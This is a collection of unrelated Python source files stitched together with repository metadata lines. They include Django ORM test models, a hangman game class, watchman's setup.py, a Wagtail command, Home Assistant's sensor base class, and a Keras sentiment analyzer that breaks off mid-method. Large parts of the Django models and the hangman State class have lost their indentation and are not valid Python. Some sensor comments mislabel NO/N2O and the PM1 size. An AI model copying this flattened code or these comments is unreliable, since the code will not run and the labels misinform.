# An inter-related setup with multiple paths from Child to Detail.
class Detail(models.Model):
data = models.CharField(max_length=10)
class MemberManager(models.Manager):
    def get_queryset(self):
        # Always join the one-to-one 'details' row so queries through this
        # manager exercise select_related.
        return super(MemberManager, self).get_queryset().select_related("details")
class Member(models.Model):
name = models.CharField(max_length=10)
details = models.OneToOneField(Detail, primary_key=True)
objects = MemberManager()
class Child(models.Model):
person = models.OneToOneField(Member, primary_key=True)
parent = models.ForeignKey(Member, related_name="children")
# Custom primary keys interfered with ordering in the past.
class CustomPk(models.Model):
name = models.CharField(max_length=10, primary_key=True)
extra = models.CharField(max_length=10)
class Meta:
ordering = ['name', 'extra']
class Related(models.Model):
custom = models.ForeignKey(CustomPk)
class CustomPkTag(models.Model):
id = models.CharField(max_length=20, primary_key=True)
custom_pk = models.ManyToManyField(CustomPk)
tag = models.CharField(max_length=20)
# An inter-related setup with a model subclass that has a nullable
# path to another model, and a return path from that model.
@python_2_unicode_compatible
class Celebrity(models.Model):
name = models.CharField("Name", max_length=20)
greatest_fan = models.ForeignKey("Fan", null=True, unique=True)
def __str__(self):
return self.name
class TvChef(Celebrity):
pass
class Fan(models.Model):
fan_of = models.ForeignKey(Celebrity)
# Multiple foreign keys
@python_2_unicode_compatible
class LeafA(models.Model):
data = models.CharField(max_length=10)
def __str__(self):
return self.data
class LeafB(models.Model):
data = models.CharField(max_length=10)
class Join(models.Model):
a = models.ForeignKey(LeafA)
b = models.ForeignKey(LeafB)
@python_2_unicode_compatible
class ReservedName(models.Model):
name = models.CharField(max_length=20)
order = models.IntegerField()
def __str__(self):
return self.name
# A simpler shared-foreign-key setup that can expose some problems.
@python_2_unicode_compatible
class SharedConnection(models.Model):
data = models.CharField(max_length=10)
def __str__(self):
return self.data
class PointerA(models.Model):
connection = models.ForeignKey(SharedConnection)
class PointerB(models.Model):
connection = models.ForeignKey(SharedConnection)
# Multi-layer ordering
@python_2_unicode_compatible
class SingleObject(models.Model):
name = models.CharField(max_length=10)
class Meta:
ordering = ['name']
def __str__(self):
return self.name
class RelatedObject(models.Model):
single = models.ForeignKey(SingleObject, null=True)
f = models.IntegerField(null=True)
class Meta:
ordering = ['single']
@python_2_unicode_compatible
class Plaything(models.Model):
name = models.CharField(max_length=10)
others = models.ForeignKey(RelatedObject, null=True)
class Meta:
ordering = ['others']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Article(models.Model):
name = models.CharField(max_length=20)
created = models.DateTimeField()
def __str__(self):
return self.name
@python_2_unicode_compatible
class Food(models.Model):
name = models.CharField(max_length=20, unique=True)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Eaten(models.Model):
food = models.ForeignKey(Food, to_field="name", null=True)
meal = models.CharField(max_length=20)
def __str__(self):
return "%s at %s" % (self.food, self.meal)
@python_2_unicode_compatible
class Node(models.Model):
num = models.IntegerField(unique=True)
parent = models.ForeignKey("self", to_field="num", null=True)
def __str__(self):
return "%s" % self.num
# Bug #12252
@python_2_unicode_compatible
class ObjectA(models.Model):
    name = models.CharField(max_length=50)
    def __str__(self):
        return self.name
    def __iter__(self):
        # Ticket #23721
        # Deliberately fails if iterated: the ORM's type checks must not
        # trigger model iteration.
        assert False, 'type checking should happen without calling model __iter__'
class ProxyObjectA(ObjectA):
class Meta:
proxy = True
class ChildObjectA(ObjectA):
pass
@python_2_unicode_compatible
class ObjectB(models.Model):
name = models.CharField(max_length=50)
objecta = models.ForeignKey(ObjectA)
num = models.PositiveSmallIntegerField()
def __str__(self):
return self.name
class ProxyObjectB(ObjectB):
class Meta:
proxy = True
@python_2_unicode_compatible
class ObjectC(models.Model):
name = models.CharField(max_length=50)
objecta = models.ForeignKey(ObjectA, null=True)
objectb = models.ForeignKey(ObjectB, null=True)
childobjecta = models.ForeignKey(ChildObjectA, null=True, related_name='ca_pk')
def __str__(self):
return self.name
@python_2_unicode_compatible
class SimpleCategory(models.Model):
name = models.CharField(max_length=15)
def __str__(self):
return self.name
@python_2_unicode_compatible
class SpecialCategory(SimpleCategory):
special_name = models.CharField(max_length=15)
def __str__(self):
return self.name + " " + self.special_name
@python_2_unicode_compatible
class CategoryItem(models.Model):
category = models.ForeignKey(SimpleCategory)
def __str__(self):
return "category item: " + str(self.category)
@python_2_unicode_compatible
class OneToOneCategory(models.Model):
new_name = models.CharField(max_length=15)
category = models.OneToOneField(SimpleCategory)
def __str__(self):
return "one2one " + self.new_name
class CategoryRelationship(models.Model):
first = models.ForeignKey(SimpleCategory, related_name='first_rel')
second = models.ForeignKey(SimpleCategory, related_name='second_rel')
class NullableName(models.Model):
name = models.CharField(max_length=20, null=True)
class Meta:
ordering = ['id']
class ModelD(models.Model):
name = models.TextField()
class ModelC(models.Model):
name = models.TextField()
class ModelB(models.Model):
name = models.TextField()
c = models.ForeignKey(ModelC)
class ModelA(models.Model):
name = models.TextField()
b = models.ForeignKey(ModelB, null=True)
d = models.ForeignKey(ModelD)
@python_2_unicode_compatible
class Job(models.Model):
name = models.CharField(max_length=20, unique=True)
def __str__(self):
return self.name
class JobResponsibilities(models.Model):
job = models.ForeignKey(Job, to_field='name')
responsibility = models.ForeignKey('Responsibility', to_field='description')
@python_2_unicode_compatible
class Responsibility(models.Model):
description = models.CharField(max_length=20, unique=True)
jobs = models.ManyToManyField(Job, through=JobResponsibilities,
related_name='responsibilities')
def __str__(self):
return self.description
# Models for disjunction join promotion low level testing.
class FK1(models.Model):
f1 = models.TextField()
f2 = models.TextField()
class FK2(models.Model):
f1 = models.TextField()
f2 = models.TextField()
class FK3(models.Model):
f1 = models.TextField()
f2 = models.TextField()
class BaseA(models.Model):
a = models.ForeignKey(FK1, null=True)
b = models.ForeignKey(FK2, null=True)
c = models.ForeignKey(FK3, null=True)
@python_2_unicode_compatible
class Identifier(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Program(models.Model):
identifier = models.OneToOneField(Identifier)
class Channel(models.Model):
programs = models.ManyToManyField(Program)
identifier = models.OneToOneField(Identifier)
class Book(models.Model):
title = models.TextField()
chapter = models.ForeignKey('Chapter')
class Chapter(models.Model):
title = models.TextField()
paragraph = models.ForeignKey('Paragraph')
class Paragraph(models.Model):
text = models.TextField()
page = models.ManyToManyField('Page')
class Page(models.Model):
text = models.TextField()
class MyObject(models.Model):
parent = models.ForeignKey('self', null=True, blank=True, related_name='children')
data = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
# Models for #17600 regressions
@python_2_unicode_compatible
class Order(models.Model):
id = models.IntegerField(primary_key=True)
class Meta:
ordering = ('pk', )
def __str__(self):
return '%s' % self.pk
@python_2_unicode_compatible
class OrderItem(models.Model):
order = models.ForeignKey(Order, related_name='items')
status = models.IntegerField()
class Meta:
ordering = ('pk', )
def __str__(self):
return '%s' % self.pk
class BaseUser(models.Model):
pass
@python_2_unicode_compatible
class Task(models.Model):
title = models.CharField(max_length=10)
owner = models.ForeignKey(BaseUser, related_name='owner')
creator = models.ForeignKey(BaseUser, related_name='creator')
def __str__(self):
return self.title
@python_2_unicode_compatible
class Staff(models.Model):
name = models.CharField(max_length=10)
def __str__(self):
return self.name
@python_2_unicode_compatible
class StaffUser(BaseUser):
staff = models.OneToOneField(Staff, related_name='user')
def __str__(self):
return self.staff
class Ticket21203Parent(models.Model):
parentid = models.AutoField(primary_key=True)
parent_bool = models.BooleanField(default=True)
created = models.DateTimeField(auto_now=True)
class Ticket21203Child(models.Model):
childid = models.AutoField(primary_key=True)
parent = models.ForeignKey(Ticket21203Parent)
class Person(models.Model):
name = models.CharField(max_length=128)
@python_2_unicode_compatible
class Company(models.Model):
name = models.CharField(max_length=128)
employees = models.ManyToManyField(Person, related_name='employers', through='Employment')
def __str__(self):
return self.name
class Employment(models.Model):
employer = models.ForeignKey(Company)
employee = models.ForeignKey(Person)
title = models.CharField(max_length=128)
# Bug #22429
class School(models.Model):
pass
class Student(models.Model):
school = models.ForeignKey(School)
class Classroom(models.Model):
school = models.ForeignKey(School)
students = models.ManyToManyField(Student, related_name='classroom')
| benjaminrigaud/django | tests/queries/models.py | Python | bsd-3-clause | 15,849 |
from Domain.Exceptions import UserDead, GameFinished
# Module-level name tag for this game type; usage not visible in this file.
hangman = "hangman"
class GameState():
    """Keeps the state of one hangman game.

    Holds the target sentence, the partially solved sentence, the number
    of remaining lives and the solved flag, so several games can run at
    the same time without affecting each other.
    """
    def __init__(self, sentence):
        # sentence.getGameSentence() returns a dict with:
        #   'letters'  -- letter -> list of positions in the sentence
        #   'solvable' -- list of characters, '_' for unsolved positions
        self.sentence = sentence
        self.gameSentence = sentence.getGameSentence()
        self.lives = 7
        self.solved = False
    def play(self, letter):
        """
        Game logic. Used to play the game
        Input: Letter - letter to be played with from the user
        Output: State(Sentence, Lives, State) - Returned states described bellow
        States: 0 - correct
                -1 - user is dead
                1 - incorrect
                2 - ended
        Raises: GameFinished if the game is already solved,
                UserDead if no lives remain before the move.
        """
        # Fixed from `self.solved is True` / `self.lives is 0`: identity
        # comparison against value literals is implementation-dependent
        # (PEP 8); use truthiness / equality instead.
        if self.solved:
            raise GameFinished("Game already solved!")
        if self.lives == 0:
            raise UserDead("Stop hanging the user!")
        positions = self.gameSentence['letters'].get(letter)
        if positions is not None:
            # Reveal every occurrence of the guessed letter.
            for i in positions:
                self.gameSentence['solvable'][i] = letter
            if '_' not in self.gameSentence['solvable']:
                self.solved = True
                return State(self.gameSentence['solvable'], self.lives, 2)
            return State(self.gameSentence['solvable'], self.lives, 0)
        # Wrong guess: lose a life; -1 signals the final (fatal) miss.
        self.lives -= 1
        state_code = -1 if self.lives == 0 else 1
        return State(self.gameSentence['solvable'], self.lives, state_code)
    def getSolvableSentence(self):
        """Return the current partially solved sentence (list of chars)."""
        return self.gameSentence['solvable']
class State():
def __init__(self, sentence, lives, state):
"""
Data transfer object for easier accessing of the current state
"""
self.sentence = sentence
self.lives = lives
self.state = state
def __str__(self):
return "{} {} {}".format(self.sentence, self.lives, self.state) | Zephyrrus/ubb | YEAR 1/SEM1/FP/LAB/Examen/Controller/GameState.py | Python | mit | 2,082 |
#!/usr/bin/env python
# vim:ts=4:sw=4:et:
import os
# Locate the watchman source tree: prefer the directory provided by CMake,
# otherwise fall back to the parent of this setup script.
watchman_src_dir = os.environ.get("CMAKE_CURRENT_SOURCE_DIR")
if watchman_src_dir is None:
    watchman_src_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "..")
# The python source dir.
# On Windows, this has to be relative to the cwd otherwise something
# in the setuptools machinery does the wrong thing and produces a
# path like `Z:blah` which on windows resolves ambiguously depending
# on the cwd.
py_dir = os.path.join(watchman_src_dir, "python")
if os.name == "nt":
    py_dir = os.path.relpath(py_dir)
def srcs(names):
    """Transform a list of source names to be relative to py_dir."""
    return ["{}/{}".format(py_dir, name) for name in names]
try:
from setuptools import setup, Extension
except:
from distutils.core import setup, Extension
# Package metadata and build configuration for the pywatchman client.
# The C extension implements the BSER (binary serialization) codec; the
# helper scripts under python/bin are installed as console utilities.
setup(
    name="pywatchman",
    version="1.4.1",
    package_dir={"": py_dir},
    description="Watchman client for python",
    author="Wez Furlong, Rain",
    author_email="wez@fb.com",
    maintainer="Wez Furlong",
    maintainer_email="wez@fb.com",
    url="https://github.com/facebook/watchman",
    long_description="Connect and query Watchman to discover file changes",
    keywords=("watchman inotify fsevents kevent kqueue portfs filesystem watcher"),
    license="BSD",
    packages=["pywatchman"],
    ext_modules=[Extension("pywatchman.bser", sources=srcs(["pywatchman/bser.c"]))],
    platforms="Platform Independent",
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "Topic :: System :: Filesystems",
        "License :: OSI Approved :: BSD License",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.6",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
    ],
    zip_safe=True,
    scripts=srcs(
        [
            "bin/watchman-make",
            "bin/watchman-wait",
            "bin/watchman-replicate-subscription",
        ]
    ),
    test_suite="tests",
)
| wez/watchman | python/setup.py | Python | apache-2.0 | 2,218 |
from __future__ import absolute_import, unicode_literals
from django.core.management.base import BaseCommand
from wagtail.wagtailcore.models import Page
class Command(BaseCommand):
    help = 'Resets url_path fields on each page recursively'

    def set_subtree(self, root, parent=None):
        """Recompute and persist ``url_path`` for *root* and all descendants."""
        root.set_url_path(parent)
        root.save(update_fields=['url_path'])
        for child_page in root.get_children():
            self.set_subtree(child_page, root)

    def handle(self, *args, **options):
        """Entry point: rebuild url_path for every page tree in the site."""
        root_nodes = Page.get_root_nodes()
        for root_node in root_nodes:
            self.set_subtree(root_node)
| chrxr/wagtail | wagtail/wagtailcore/management/commands/set_url_paths.py | Python | bsd-3-clause | 577 |
"""Component to interface with various sensors that can be monitored."""
from __future__ import annotations
from collections.abc import Mapping
from contextlib import suppress
from dataclasses import dataclass
from datetime import datetime, timedelta
import inspect
import logging
from typing import Any, Final, cast, final
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
DEVICE_CLASS_AQI,
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_CO,
DEVICE_CLASS_CO2,
DEVICE_CLASS_CURRENT,
DEVICE_CLASS_ENERGY,
DEVICE_CLASS_GAS,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_ILLUMINANCE,
DEVICE_CLASS_MONETARY,
DEVICE_CLASS_NITROGEN_DIOXIDE,
DEVICE_CLASS_NITROGEN_MONOXIDE,
DEVICE_CLASS_NITROUS_OXIDE,
DEVICE_CLASS_OZONE,
DEVICE_CLASS_PM1,
DEVICE_CLASS_PM10,
DEVICE_CLASS_PM25,
DEVICE_CLASS_POWER,
DEVICE_CLASS_POWER_FACTOR,
DEVICE_CLASS_PRESSURE,
DEVICE_CLASS_SIGNAL_STRENGTH,
DEVICE_CLASS_SULPHUR_DIOXIDE,
DEVICE_CLASS_TEMPERATURE,
DEVICE_CLASS_TIMESTAMP,
DEVICE_CLASS_VOLATILE_ORGANIC_COMPOUNDS,
DEVICE_CLASS_VOLTAGE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
)
from homeassistant.helpers.entity import Entity, EntityDescription
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.typing import ConfigType, StateType
from .const import CONF_STATE_CLASS # noqa: F401
_LOGGER: Final = logging.getLogger(__name__)
ATTR_LAST_RESET: Final = "last_reset" # Deprecated, to be removed in 2021.11
ATTR_STATE_CLASS: Final = "state_class"
DOMAIN: Final = "sensor"
ENTITY_ID_FORMAT: Final = DOMAIN + ".{}"
SCAN_INTERVAL: Final = timedelta(seconds=30)
DEVICE_CLASSES: Final[list[str]] = [
DEVICE_CLASS_AQI, # Air Quality Index
DEVICE_CLASS_BATTERY, # % of battery that is left
DEVICE_CLASS_CO, # ppm (parts per million) Carbon Monoxide gas concentration
DEVICE_CLASS_CO2, # ppm (parts per million) Carbon Dioxide gas concentration
DEVICE_CLASS_CURRENT, # current (A)
DEVICE_CLASS_ENERGY, # energy (kWh, Wh)
DEVICE_CLASS_HUMIDITY, # % of humidity in the air
DEVICE_CLASS_ILLUMINANCE, # current light level (lx/lm)
DEVICE_CLASS_MONETARY, # Amount of money (currency)
DEVICE_CLASS_OZONE, # Amount of O3 (µg/m³)
DEVICE_CLASS_NITROGEN_DIOXIDE, # Amount of NO2 (µg/m³)
DEVICE_CLASS_NITROUS_OXIDE, # Amount of NO (µg/m³)
DEVICE_CLASS_NITROGEN_MONOXIDE, # Amount of N2O (µg/m³)
DEVICE_CLASS_PM1, # Particulate matter <= 0.1 μm (µg/m³)
DEVICE_CLASS_PM10, # Particulate matter <= 10 μm (µg/m³)
DEVICE_CLASS_PM25, # Particulate matter <= 2.5 μm (µg/m³)
DEVICE_CLASS_SIGNAL_STRENGTH, # signal strength (dB/dBm)
DEVICE_CLASS_SULPHUR_DIOXIDE, # Amount of SO2 (µg/m³)
DEVICE_CLASS_TEMPERATURE, # temperature (C/F)
DEVICE_CLASS_TIMESTAMP, # timestamp (ISO8601)
DEVICE_CLASS_PRESSURE, # pressure (hPa/mbar)
DEVICE_CLASS_POWER, # power (W/kW)
DEVICE_CLASS_POWER_FACTOR, # power factor (%)
DEVICE_CLASS_VOLTAGE, # voltage (V)
DEVICE_CLASS_VOLATILE_ORGANIC_COMPOUNDS, # Amount of VOC (µg/m³)
DEVICE_CLASS_GAS, # gas (m³ or ft³)
]
DEVICE_CLASSES_SCHEMA: Final = vol.All(vol.Lower, vol.In(DEVICE_CLASSES))
# The state represents a measurement in present time
STATE_CLASS_MEASUREMENT: Final = "measurement"
# The state represents a monotonically increasing total, e.g. an amount of consumed gas
STATE_CLASS_TOTAL_INCREASING: Final = "total_increasing"
STATE_CLASSES: Final[list[str]] = [
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
]
STATE_CLASSES_SCHEMA: Final = vol.All(vol.Lower, vol.In(STATE_CLASSES))
async def async_setup(hass: HomeAssistant, config: ConfigType) -> bool:
    """Track states and offer events for sensors."""
    component = EntityComponent(_LOGGER, DOMAIN, hass, SCAN_INTERVAL)
    hass.data[DOMAIN] = component
    await component.async_setup(config)
    return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
    """Set up a config entry."""
    return await cast(EntityComponent, hass.data[DOMAIN]).async_setup_entry(entry)
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
    """Unload a config entry."""
    return await cast(EntityComponent, hass.data[DOMAIN]).async_unload_entry(entry)
@dataclass
class SensorEntityDescription(EntityDescription):
    """A class that describes sensor entities."""

    last_reset: datetime | None = None  # Deprecated, to be removed in 2021.11
    native_unit_of_measurement: str | None = None
    state_class: str | None = None
    unit_of_measurement: None = None  # Type override, use native_unit_of_measurement

    def __post_init__(self) -> None:
        """Post initialisation processing.

        Migrates a deprecated ``unit_of_measurement`` assignment to
        ``native_unit_of_measurement`` and logs a warning naming the
        integration that set it.
        """
        if self.unit_of_measurement:
            # Walk two frames up the stack to find the module that
            # instantiated this description so the warning can name it
            # (frame-depth sensitive: do not add intermediate calls here).
            caller = inspect.stack()[2]  # type: ignore[unreachable]
            module = inspect.getmodule(caller[0])
            if "custom_components" in module.__file__:
                report_issue = "report it to the custom component author."
            else:
                report_issue = (
                    "create a bug report at "
                    "https://github.com/home-assistant/core/issues?q=is%3Aopen+is%3Aissue"
                )
            _LOGGER.warning(
                "%s is setting 'unit_of_measurement' on an instance of "
                "SensorEntityDescription, this is not valid and will be unsupported "
                "from Home Assistant 2021.11. Please %s",
                module.__name__,
                report_issue,
            )
            self.native_unit_of_measurement = self.unit_of_measurement
class SensorEntity(Entity):
    """Base class for sensor entities."""

    entity_description: SensorEntityDescription
    _attr_last_reset: datetime | None  # Deprecated, to be removed in 2021.11
    _attr_native_unit_of_measurement: str | None
    _attr_native_value: StateType = None
    _attr_state_class: str | None
    _attr_state: None = None  # Subclasses of SensorEntity should not set this
    _attr_unit_of_measurement: None = (
        None  # Subclasses of SensorEntity should not set this
    )
    # One-shot flags so each deprecation warning below is logged at most once
    # per entity instance.
    _last_reset_reported = False
    _temperature_conversion_reported = False

    @property
    def state_class(self) -> str | None:
        """Return the state class of this entity, from STATE_CLASSES, if any."""
        # Instance attribute takes precedence over the entity description.
        if hasattr(self, "_attr_state_class"):
            return self._attr_state_class
        if hasattr(self, "entity_description"):
            return self.entity_description.state_class
        return None

    @property
    def last_reset(self) -> datetime | None:  # Deprecated, to be removed in 2021.11
        """Return the time when the sensor was last reset, if any."""
        if hasattr(self, "_attr_last_reset"):
            return self._attr_last_reset
        if hasattr(self, "entity_description"):
            return self.entity_description.last_reset
        return None

    @property
    def capability_attributes(self) -> Mapping[str, Any] | None:
        """Return the capability attributes."""
        if state_class := self.state_class:
            return {ATTR_STATE_CLASS: state_class}
        return None

    @final
    @property
    def state_attributes(self) -> dict[str, Any] | None:
        """Return state attributes.

        Exposes the deprecated ``last_reset`` value and warns once when it is
        combined with the ``measurement`` state class.
        """
        if last_reset := self.last_reset:
            if (
                self.state_class == STATE_CLASS_MEASUREMENT
                and not self._last_reset_reported
            ):
                self._last_reset_reported = True
                report_issue = self._suggest_report_issue()
                _LOGGER.warning(
                    "Entity %s (%s) with state_class %s has set last_reset. Setting "
                    "last_reset is deprecated and will be unsupported from Home "
                    "Assistant Core 2021.11. Please update your configuration if "
                    "state_class is manually configured, otherwise %s",
                    self.entity_id,
                    type(self),
                    self.state_class,
                    report_issue,
                )
            return {ATTR_LAST_RESET: last_reset.isoformat()}
        return None

    @property
    def native_value(self) -> StateType:
        """Return the value reported by the sensor."""
        return self._attr_native_value

    @property
    def native_unit_of_measurement(self) -> str | None:
        """Return the unit of measurement of the sensor, if any."""
        if hasattr(self, "_attr_native_unit_of_measurement"):
            return self._attr_native_unit_of_measurement
        if hasattr(self, "entity_description"):
            return self.entity_description.native_unit_of_measurement
        return None

    @final
    @property
    def unit_of_measurement(self) -> str | None:
        """Return the unit of measurement of the entity, after unit conversion."""
        # Support for _attr_unit_of_measurement will be removed in Home Assistant 2021.11
        if (
            hasattr(self, "_attr_unit_of_measurement")
            and self._attr_unit_of_measurement is not None
        ):
            return self._attr_unit_of_measurement  # type: ignore
        native_unit_of_measurement = self.native_unit_of_measurement
        # Temperatures are always presented in the user-configured unit.
        if native_unit_of_measurement in (TEMP_CELSIUS, TEMP_FAHRENHEIT):
            return self.hass.config.units.temperature_unit
        return native_unit_of_measurement

    @final
    @property
    def state(self) -> Any:
        """Return the state of the sensor and perform unit conversions, if needed."""
        unit_of_measurement = self.native_unit_of_measurement
        value = self.native_value
        units = self.hass.config.units
        if (
            value is not None
            and unit_of_measurement in (TEMP_CELSIUS, TEMP_FAHRENHEIT)
            and unit_of_measurement != units.temperature_unit
        ):
            if (
                self.device_class != DEVICE_CLASS_TEMPERATURE
                and not self._temperature_conversion_reported
            ):
                self._temperature_conversion_reported = True
                report_issue = self._suggest_report_issue()
                _LOGGER.warning(
                    "Entity %s (%s) with device_class %s reports a temperature in "
                    "%s which will be converted to %s. Temperature conversion for "
                    "entities without correct device_class is deprecated and will"
                    " be removed from Home Assistant Core 2022.3. Please update "
                    "your configuration if device_class is manually configured, "
                    "otherwise %s",
                    self.entity_id,
                    type(self),
                    self.device_class,
                    unit_of_measurement,
                    units.temperature_unit,
                    report_issue,
                )
            # Preserve the decimal precision of the reported value after
            # converting it to the configured temperature unit.
            value_s = str(value)
            prec = len(value_s) - value_s.index(".") - 1 if "." in value_s else 0
            # Suppress ValueError (Could not convert sensor_value to float)
            with suppress(ValueError):
                temp = units.temperature(float(value), unit_of_measurement)
                value = round(temp) if prec == 0 else round(temp, prec)
        return value

    def __repr__(self) -> str:
        """Return the representation.

        Entity.__repr__ includes the state in the generated string, this fails if we're
        called before self.hass is set.
        """
        if not self.hass:
            return f"<Entity {self.name}>"
        return super().__repr__()
 | FreekingDean/home-assistant | homeassistant/components/sensor/__init__.py | Python | apache-2.0 | 11968 |
#!/usr/bin/env python
# -*- mode: python; coding: utf-8 -*-
##################################################################
# Documentation
##################################################################
# Imports
from __future__ import absolute_import, unicode_literals, print_function
try:
from cPickle import dump, load
except ImportError:
from _pickle import dump, load
from collections import Counter
from copy import deepcopy
from keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard
from keras.layers.embeddings import Embedding
from keras.models import load_model
from keras.preprocessing.sequence import pad_sequences
from keras.regularizers import l2
from keras.utils import to_categorical
from six import iteritems
from sklearn.utils.class_weight import compute_class_weight
from tempfile import mkstemp
import abc
import numpy as np
import os
from cgsa.base import BaseAnalyzer
from cgsa.utils.common import LOGGER, is_relevant, normlex
from .layers import CUSTOM_OBJECTS, DFLT_INITIALIZER, EMPTY_IDX, UNK_IDX
from .layers.word2vec import Word2Vec
from .utils import ModelMGPU, N_GPUS
##################################################################
# Variables and Constants
# default dimensionality for task-specific vectors
DFLT_VDIM = 100
DFLT_N_EPOCHS = 24 # 24
EMPTY_TOK = "%EMPTY%"
UNK_TOK = "%UNK%"
DICT_OFFSET = 1
UNK_PROB = 1e-4
L2_COEFF = 1e-4
EMB_INDICES_NAME = "embedding_indices"
# LBA Results for Different Optimizers:
# sgd: Macro: 10.33%; Micro: 36.2623%;
# rmsprop: Macro: 30.84%; Micro: 44.5902%;
# adagrad: Macro: 35.45%; Micro: 61.5738%;
# adadelta: 30.84%; Micro: 44.5902%;
# adam: Macro: 30.84%; Micro: 44.5902%;
# nadam: 30.84%; Micro: 44.5902%;
DFLT_TRAIN_PARAMS = {"optimizer": "adagrad",
"metrics": ["categorical_accuracy"],
"loss": "categorical_hinge"}
##################################################################
# Methods
##################################################################
# Class
class DLBaseAnalyzer(BaseAnalyzer):
"""Class for DeepLearning-based sentiment analysis.
Attributes:
"""
def __init__(self, w2v=False, lstsq=False, embeddings=None, **kwargs):
"""Class constructor.
Args:
w2v (bool): use word2vec embeddings
lstsq (bool): use the least squares method
embeddings (cgsa.utils.word2vec.Word2Vec or None): pretrained
embeddings
"""
super(DLBaseAnalyzer, self).__init__()
self.name = "DLBaseAnalyzer"
# boolean flags indicating whether to use external embeddings
self._w2v = w2v
self._lstsq = lstsq
# actual external embeddings
self._embeddings = embeddings
# mapping from words to their embedding indices in `self._embs` or
# `self.W_EMB`
self._w2i = {EMPTY_TOK: EMPTY_IDX, UNK_TOK: UNK_IDX}
self._pad_value = EMPTY_IDX
# mapping from words to their embeddings (will be initialized after
# training the network, if `w2v` or `lstsq` are true)
self._embs = None
# least squares matrix (will be initialized after training the network,
# if true)
self._lstsq_mtx = None
self.ndim = -1 # vector dimensionality will be initialized later
self.intm_dim = -1
self._model = None
self._model_path = None
self._trained = False
self._n_epochs = DFLT_N_EPOCHS
# mapping from word to its embedding index
self._aux_keys = set((0, 1))
self._max_seq_len = -1
self._min_width = 0
self._n_y = 0
self._train_params = deepcopy(DFLT_TRAIN_PARAMS)
self._fit_params = {}
# variables needed for training
self._w_stat = self._pred_class = None
self.W_EMB = self._cost = self._dev_cost = None
# initialize functions to None
self._reset_funcs()
# set up functions for obtaining word embeddings at train and test
# times
self._init_wemb_funcs()
def train(self, train_x, train_y, dev_x, dev_y,
a_grid_search, a_multi_gpu):
self._start_training()
self._logger.debug("Training %s...", self.name)
self._logger.debug("Preparing dataset...")
train_x, train_y, dev_x, dev_y = self._prepare_data(
train_x, train_y, dev_x, dev_y
)
self._logger.debug("Dataset ready...")
# initialize the network
self._logger.debug("Initializing the network...")
# self._update_fit_params(train_y)
self._init_nn()
self._logger.debug("Network ready...")
# initialize callbacks
_, ofname = mkstemp(suffix=".hdf5", prefix=self.name + '.')
try:
early_stop = EarlyStopping(patience=3, verbose=1)
chck_point = ModelCheckpoint(
filepath=ofname, monitor="val_categorical_accuracy",
mode="auto", verbose=1,
save_weights_only=True,
save_best_only=True
)
tensorboard = TensorBoard(
log_dir=os.environ.get("TENSORBOARD_DIR", "/tmp"),
histogram_freq=1, batch_size=32,
write_graph=True, write_grads=True
)
if a_multi_gpu:
train_model = ModelMGPU(self._model)
self._fit_params["batch_size"] = 32 * N_GPUS
train_model.compile(**self._train_params)
else:
train_model = self._model
train_model.fit(train_x, train_y,
validation_data=(dev_x, dev_y),
epochs=self._n_epochs,
callbacks=[early_stop, chck_point, tensorboard],
**self._fit_params)
self._model.load_weights(ofname)
self._finish_training()
finally:
os.remove(ofname)
self._logger.debug("%s trained", self.name)
def predict_proba(self, msg, yvec):
wseq = self._tweet2wseq(msg)
embs = np.array(
self._pad(len(wseq), self._pad_value)
+ [self.get_test_w_emb(w) for w in wseq], dtype="int32")
ret = self._model.predict(np.asarray([embs]),
batch_size=1,
verbose=2)
yvec[:] = ret[0]
def predict_proba_raw(self, messages):
yvecs = np.zeros((len(messages), self._n_y))
for i, msg_i in enumerate(messages):
self.predict_proba(msg_i, yvecs[i])
return yvecs
def restore(self, embs):
"""Restore members which could not be serialized.
Args:
embs (cgsa.utils.word2vec.Word2Vec or None): pretrained
embeddings
"""
self._embeddings = embs
self._logger = LOGGER
self._init_wemb_funcs()
def reset(self):
"""Remove members which cannot be serialized.
"""
# set functions to None
self._reset_funcs()
self._embeddings = None
self.W_EMB = None
super(DLBaseAnalyzer, self).reset()
    def save(self, path):
        """Dump model to disc.

        The Keras model cannot be pickled directly, so it is written
        separately to ``path + ".h5"`` and temporarily detached while the
        rest of the analyzer is pickled to ``path``.

        Args:
            path (str): file path at which to store the model

        Returns:
            void:

        """
        # Save the Keras model next to the pickle; only its basename is kept
        # so all stored paths stay relative.
        model_path = path + ".h5"
        self._model.save(model_path)
        self._model_path = os.path.basename(model_path)
        # all paths are relative
        model = self._model
        # Detach the unpicklable model, pickle the analyzer, then reattach.
        self._model = None
        with open(path, "wb") as ofile:
            dump(self, ofile)
        self._model = model
def _load(self, a_path):
super(DLBaseAnalyzer, self)._load(a_path)
self._model = load_model(
os.path.join(a_path, self._model_path),
custom_objects=CUSTOM_OBJECTS
)
@abc.abstractmethod
def _init_nn(self):
"""Initialize neural network.
"""
raise NotImplementedError
def _extract_feats(self, a_tweet):
pass
def _start_training(self):
"""Prepare for training.
"""
self._trained = False
def _finish_training(self):
"""Finalize the trained network.
"""
self._logger.info("Finalizing network")
if self._lstsq or self._w2v:
emb_layer_idx = self._get_layer_idx()
if self._lstsq:
# Extract embeddings from the network
task_embs = self._model.layers[emb_layer_idx].get_weights()
assert len(task_embs) == 1, \
("Unmatching number of trained paramaters:"
" {:d} instead of {:d}").format(
len(task_embs), 1)
